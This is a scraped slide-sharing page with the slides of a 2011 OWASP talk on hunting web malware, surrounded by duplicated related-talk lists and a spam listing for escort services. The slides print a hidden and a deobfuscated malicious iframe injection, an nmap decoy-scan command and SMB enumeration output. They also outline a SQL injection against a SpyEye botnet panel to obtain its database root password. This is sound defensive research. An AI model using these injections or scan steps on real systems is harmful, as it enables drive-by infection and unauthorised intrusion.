Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodAditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineAditya K Sood
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...Aditya K Sood
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis PaperAditya K Sood
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware TaxonomyAditya K Sood
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingAditya K Sood
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Aditya K Sood
 

Plus de Aditya K Sood (20)

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks Malware
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and Defences
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android Infections
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks Malware
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing
 

Dernier

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 

Dernier (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 

OWASP AppSec USA 2011 - Dismantling Web Malware

  • 1. The Good Hacker – Dismantling Web Malware Aditya K Sood and Richard J Enbody SecNiche Security Labs Michigan State University OWASP adi_ks [at] secniche.org | enbody [at] cse.msu.edu AppSec USA 2011 Minneapolis, Minnesota Copyright © The OWASP Foundation September 22-23, Permission is granted to copy, distribute and/or modify this document 2010 under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. Disclaimer  All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current, or any of my previous in that effect, employers. Dependency  Penetration Testing  Web Malware Hunting Thanks  Cigital Inc. for supporting our talk. OWASP 2
  • 3. About Us  Aditya K Sood  Founder , SecNiche Security  Independent Security Consultant, Researcher and Practitioner  Worked previously for Armorize, Coseinc and KPMG  Active Speaker at Security conferences  Written Content – ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NES|CFS  LinkedIn : http://www.linkedin.com/in/adityaks  Website: http://www.secniche.org | Blog: http://secniche.blogspot.com | @AdityaKSood  PhD Candidate at Michigan State University  Dr. Richard J Enbody  Associate Professor, CSE, Michigan State University  Since 1987, teaching computer architecture/ computer security / mathematics  Website: http://www.cse.msu.edu/~enbody  Co-Author CS1 Python book, The Practice of Computing using Python.  Patents Pending – Hardware Buffer Overflow Protection OWASP 3
  • 4. This talk is all about …………… Malware Hunter (Good Hacker) = Penetration Testing + Web Security + Malware Analysis OWASP 4
  • 5. Agenda Malware Paradigm – The State of Online World Reality of Browsers Browser Malware Taxonomy Website Infection – Strategies used by Attackers Website Traffic Analysis and Dumps  Methodology Hunting Web Malware  Case Study 1  BlackHole Exploit Pack  Case Study 2  SpyEye Command and Control Take Down Conclusion OWASP 5
  • 6. Anatomy of Malware – Unbearable Truth OWASP 6
  • 7. Malware – Impact on Real World OWASP 7
  • 8. Underground Malware – Market Business © GDATA OWASP 8
  • 9. Malware Flow Model Malware Writers Role Flow of Malware Websites © Reihe Informatik. TR-2007-011 OWASP 9
  • 10. Reality of Browsers – Truth Behind the Bars  Old Browsers Die Hard http://www.ie6countdown.com/ OWASP 10
  • 11. Browser Malware Taxonomy  Class A – Browser Malware OWASP 11
  • 12. Browser Malware Taxonomy  Class B – Browser Malware OWASP 12
  • 13. Browser Malware Taxonomy  Class C – Browser Malware OWASP 13
  • 14. Website Infections – Malware Kicking  Finest Malware Infection Attacks  Iframe Injections ( Hidden + Unhidden) – <iframe src =“” width=0 height=0 /> » Obfuscated hyperlinks to malicious files » Malvertisements ( on fire nowadays)  Rogue .JS / .SWF – <script src =“”/> | <object /> | <embed /> » Obfuscated scripts are the best choice  Compromising Servers – Exploiting web virtual hosting – Open Relay Server : sending spams with malicious links – FTP Servers – Hacking credentials to update website files – Database Servers – Persistent SQL injections / XSS Bugs » Mass SQL injections on rise  Server Side Redirects (Persistent) – Injecting malicious redirects in the web server configuration files 14 OWASP
  • 15. Drive By Downloads – The Evil Reaction Complete Details – Victim browser is forced to visit infected website – Iframe redirects browser to the EXPLOIT POINT (Exploit Hub) – Exploit is served by fingerprinting browser environment – Browser is exploited successfully – Exploit point silently asks for the malware from the malicious domain » It can be self driven – Malware is downloaded into system and automatically installed OWASP 15
  • 16. Drive By Cache – Holy Crap !  What is it ? – Brother of Drive by Download Attacks. Is it ? – More efficient way to bypass anti virus protections .  Drive by Cache / Drive by Downloads – Very less variations have been noticed ( Drive By Cache) – However, the infections are still in the wild and some of the traces have been noticed – Lot more to research over this attack but it has been initialized already – Reference: http://blog.armorize.com/2011/04/newest-adobe- flash-0-day-used-in-new.html OWASP 16
  • 17. Website Malware Scanning – Cloud in Action  URL Dissection  Google Safe Browsing – User-Agent (Browser Specific)/ DNS Blacklisting – Past history of malware specific domains Online Web Malware Scanners Blacklisted URL’s Suspicious URL’s Malware URL’s Clean URL’s OWASP 17
  • 18. Web Malware Hunting - Core OWASP 18
  • 19. Hunting Web Malware  Required Techniques and Tactics  Detailed understanding of different malware taxonomies – The way malware enters into system from web – Example: Malvertisements, Drive by Download attacks.  Categorization and Classification of malware is important – Explicitly defines the malware working – Defines the exact target to hunt  Understanding of Browser exploitation in detail – Malware infecting various component of browsers  Web attacks and defenses – Latest attack developments in the field of web  Penetration Testing (System Level) is the key to success – Hard to imagine to hunt malware without reverse hacking OWASP 19
  • 20. Pattern Detection – Google in Action  Detecting Live Targets  Search for specific patterns using Google – Iframe patterns / strings/ malware domain names etc OWASP 20
  • 21. Pattern Detection – Malware Domains Listing  Public Repositories OWASP 21
  • 22. Dissecting Traffic Dumps and Analysis  Malware Traffic - PCAP Files  Raw dumps of captured packets  Provides information about traffic – Ingress/Egress traffic  Information about the DNS Servers, IP Addresses – Malicious executable served by the malicious domain  Protocol abuse Extracting Malware (Executables/ Binaries)  WireShark – follow TCP/UDP stream  Dump data and edit with hex editor  Verifying the PE headers (specially MZ)  Rebuild the files for static and behavioral analysis OWASP 22
  • 23. Dissecting Traffic Dumps and Analysis  What Else than WireShark ?  Network Miner OWASP 23
  • 24. Dissecting Traffic Dumps and Analysis  What Else than WireShark ?  Xplico  Scapy (Network – Swiss Army Knife) OWASP 24
  • 25. Dissecting Traffic Dumps and Analysis  Walking through the Process (Generic)  Step 1 - Applying filters in WireShark ( to remove unwanted traffic) » http://media.packetlife.net/media/library/13/Wireshark_Dis play_Filters.pdf  Step 2 - Create the requisite PCAP files » Use rdpcap() / sniff(offline=“”) (Scapy) to walkthrough PCAP files » Pdfdump/Psdump to make graphical output  Step 3 - Perform data operations (Scapy) » Example: Writing first 5 bytes file_handle(pkt.load[5:]) » Other required data operations  Step 4 – Automated mining of PCAP files » Use Network Miner and Xplico OWASP 25
  • 26. Extracting Executables from HTTP/HTTPS Traffic  TCP Session Stream Analysis  Reconstructing the TCP session stream  Scrutinize the content present in the TCP session  Malware binaries are present as raw/encoded data  Verifying the HTTP/HTTPS end points to collect all data  What to Look For ?  Find the starting point of TCP communication  Follow the TCP session stream – WireShark does that for you.  Walkthrough the raw data. – Search for two byte header MZ ($4D5A in hex) which begins at a certain offset to trace the PE – Dump the binary as raw output. Avoid encodings. OWASP 26
  • 27. Extracting Executables from HTTP/HTTPS Traffic OWASP 27
  • 28. Case Studies – Malware Hunting OWASP 28
  • 29. Case Study – BlackHole Exploit Pack - Hunt  BlackHole Exploit Pack  One of the frivolous used exploit pack  Used extensively for spreading malware  Exploits browser and plugin vulnerabilities  Collaboratively used with botnets to spread malware BlackHole – Spreading Infection  A malicious link is served through spams  Social engineering to force victims to visit malicious links  Manipulating social networking capabilities  Spreading scams and tricking victims to work it out Note: This case study is an outcome of real time hunting of web malware in a university network. OWASP 29
  • 30. Case Study – BlackHole Exploit Pack - Hunt  Understanding the Environment  A malicious website was hosted by the attacker  Utilized a zombie machine to host a web server  Fake emails were pushed in legitimate networks – Malicious link was injected into it – Malicious website hosted a web page with link to malicious domain  Malicious iframe was detected and deobfuscated as <iframe src="http://malware/phx/index.php" width="1" height="1" frameborder="0“></iframe>  “index.php” fingerprinted the browser (version / plugins)  Exploit was served based on the environment OWASP 30
  • 31. Case Study – BlackHole Exploit Pack - Hunt  Exploit Serving  “index.php” found the installed JAVA to be vulnerable  It exploited JAVA SMB vulnerability and started throwing the requisite exploit for it  ALERT ! – JAVA SMB exploit requires an SMB server to be installed on the domain or subdomain to include the exploit through UNC path  Mapping the IP and NMAP scan was initiated – Decoy Scan and IP Spoofing scans are always the best nmap -P0 -A -T4 -sS blackhole_host -D 112.123.124.111 -p 445 Starting Nmap 5.51 ( http://nmap.org ) at 2011-04-06 13:07 Eastern Daylight Time PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.X Running: Linux 2.6.X OS details: Linux 2.6.17 - 2.6.35 Network Distance: 1 hop Host script results: |_, NetBIOS user: , NetBIOS MAC: |_smbv2-enabled: Server doesn't support SMBv2 protocol OWASP 31
  • 32. Case Study – BlackHole Exploit Pack - Hunt  Exploit Serving  “new.avi” file was served as an exploit  Gotcha ! – SMB server was configured and serving exploit » Hard to think whether the usermode security is applied » SMB usermode = {username, password} required  So What – Shared mode is configured – Default IPC$ share was available E:audit>enum -P blackhole_host server: blackhole_host setting up session... success. password policy: min length: 5 chars min age: none max age: none lockout threshold: none lockout duration: 30 mins lockout reset: 30 mins cleaning up... success. OWASP 32
  • 33. Case Study – BlackHole Exploit Pack - Hunt  Verifying the Facts  The server was not browseable  Fuzzing the UNC path as follows • blackhole_hosthomenew.avi • blackhole_hostusrnew.avi • blackhole_hosthomesmbnew.avi [ Gotcha] • blackhole_hostusrsmbnew.avi  SMB server must be configured with following metrics [global] security = share [smb] comment = smb path = /home/smb public = yes browseable = no writeable = no guest ok = yes OWASP 33
  • 34. Case Study – BlackHole Exploit Pack - Hunt  At Last  We were also able to crack the SMB login credentials to take control over the server. OWASP 34
  • 35. Case Study – Botnet C&C SQL Injection  SpyEye Botnet C&C Target  Exploiting the SQL injection to take control of  Fetch the target using abuse.ch service OWASP 35
  • 36. Case Study – Botnet C&C SQL Injection  SpyEye Botnet C&C Target  Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="  Getting the version number OWASP 36
  • 37. Case Study – Botnet C&C SQL Injection  SpyEye Botnet C&C Target  Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="  Getting the database OWASP 37
  • 38. Case Study – Botnet C&C SQL Injection  SpyEye Botnet C&C Target  Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="  Getting the MySQL root password OWASP 38
  • 39. Conclusion  For Rigorous Web Malware Hunting  Robust penetration testing skills required  Understanding of – Malware infection framework – Working of exploit serving mechanisms – Detailed web security knowledge with all types of attacks  At last, think like an attacker OWASP 39
  • 40. References  Notorious Datacenter Servers - Support Systems Pwning Through Outer Sphere : http://magazine.hitb.org/issues/HITB-Ezine-Issue-004.pdf  Exploiting Web Virtual Hosting – Malware Infections : http://magazine.hitb.org/issues/HITB-Ezine-Issue-005.pdf  Browser Malware Taxonomy : http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106- browser-malware-taxonomy  SpyEye Malware Infection Framework : http://www.virusbtn.com/virusbulletin/archive/2011/07/vb201107- SpyEye  SpyEye Bot – Aggressive Exploitation Tactics : http://www.virusbtn.com/virusbulletin/archive/2011/08/vb201108-spyeye  Malware at Stake : http://secniche.blogspot.com OWASP 40
  • 41. Thanks  OWASP (http://www.owasp.org )  SecNiche Security Labs (http://www.secniche.org )  Cigital Inc  Twitter - @AdityaKSood  Feel free to send any queries. OWASP 41